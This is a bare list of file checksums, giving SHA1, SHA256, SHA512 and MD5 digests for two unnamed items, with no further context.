SHA12c7bbedd79791bfb866898c85b504186db610b5d
SHA256ea1e16247c848c8c171c4cd1fa17bc5a018a1fcb0c0dac25009066b6667b8eef
SHA512278fe3a4b1fbbe700e4f4483b610133e975e36e101455661d5197bd892a68839b9d555499040d200c92aefa9e3819380e395c0cd85d5fc845c6364d128a8cf06
-
MD5
69634bfa7067cb53b5da3d65be5e469b
SHA104ed976bbfad41aea52d682b9511e02930322662
SHA256f20f685cf0b643237c58a99ffd2abf32cbad0b5f6bd7fccb1d252a7227ae48e4
SHA512ce4cce407ebed03ffff38b66e5207e2929158466a0bc3210c99f978bfd37ff741976b166a0bfaaf6f9967e56fdf17abf3c6ac6b17007c4e28404def69801ff36